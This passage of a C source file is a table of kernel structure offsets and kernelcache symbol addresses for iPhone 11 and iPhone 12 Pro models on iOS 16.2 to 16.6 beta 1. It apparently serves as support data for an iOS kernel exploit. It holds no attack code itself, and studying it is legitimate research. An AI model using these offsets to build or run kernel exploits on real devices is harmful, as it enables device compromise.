0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a431288, .kernelcache__gPhysBase = 0xfffffff007950010, .kernelcache__gPhysSize = 0xfffffff007950010 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e1e8, .kernelcache__perfmon_devices = 0xfffffff00a46f4f0, .kernelcache__perfmon_dev_open = 0xfffffff007efb5d0, .kernelcache__ptov_table = 0xfffffff007903178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a46e990, .kernelcache__vm_pages = 0xfffffff0078ffeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a46e988, .kernelcache__vn_kqfilter = 0xfffffff007f4a41c, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", .build_version = "20G5026e", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4c5ab0, .kernelcache__gPhysBase = 0xfffffff0079641b8, .kernelcache__gPhysSize = 0xfffffff0079641b8 + 0x8, .kernelcache__gVirtBase = 0xfffffff007962370, .kernelcache__perfmon_devices = 0xfffffff00a505520, .kernelcache__perfmon_dev_open = 0xfffffff007f1bd78, .kernelcache__ptov_table = 0xfffffff0079179b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a504910, .kernelcache__vm_pages = 0xfffffff007914100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007916958, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a504908, .kernelcache__vn_kqfilter = 0xfffffff007f6a588, }, // End iPhone 11 // // End iPhone SE 2nd, iPhone 11 Pro, iPhone 11 Pro Max, iPhone 11 series // // Start iPhone 12 Pro, iPhone 12 Pro Max, iPhone 12, iPhone 12 Mini series // // Start iPhone 12 Pro // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPhone13,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff0078500c8, .kernelcache__gPhysSize = 0xfffffff0078500c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784e2a8, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed41c4, .kernelcache__ptov_table = 0xfffffff007803378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff007800090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f26780, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPhone13,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPhone13,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E247", .device_id = "iPhone13,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPhone13,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPhone13,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a49d288, .kernelcache__gPhysBase = 0xfffffff007930100, .kernelcache__gPhysSize = 0xfffffff007930100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e2d8, .kernelcache__perfmon_devices = 0xfffffff00a4db520, .kernelcache__perfmon_dev_open = 0xfffffff007ef484c, .kernelcache__ptov_table = 0xfffffff0078e3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4da990, .kernelcache__vm_pages = 0xfffffff0078dfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4da988, .kernelcache__vn_kqfilter = 0xfffffff007f439d0, }, // iOS 16.6 beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPhone13,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x58, .task__threads__prev = 0x60, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x360, .thread__task_threads__prev = 0x368, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x0 + 0x10, //0x8 ._vm_map__hdr__links__next = 0x8 + 0x10, //0x10 ._vm_map__hdr__links__start = 0x10 + 0x10, //0x18 ._vm_map__hdr__links__end = 0x18 + 0x10, //0x20 ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x98, ._vm_map__hole_hint = 0xa0, ._vm_map__holes_list = 0xa8, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a545ab0, .kernelcache__gPhysBase = 0xfffffff0079442a8, .kernelcache__gPhysSize = 0xfffffff0079442b0, //79442B0 .kernelcache__gVirtBase = 0xfffffff007942460, .kernelcache__perfmon_devices = 0xfffffff00a585550, .kernelcache__perfmon_dev_open = 0xfffffff007f1508c, .kernelcache__ptov_table = 0xfffffff0078f79c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a584910, .kernelcache__vm_pages = 0xfffffff0078f4108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a584908, .kernelcache__vn_kqfilter = 0xfffffff007f63be0, }, // End iPhone 12 Pro // // Start iPhone 12 Pro Max // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 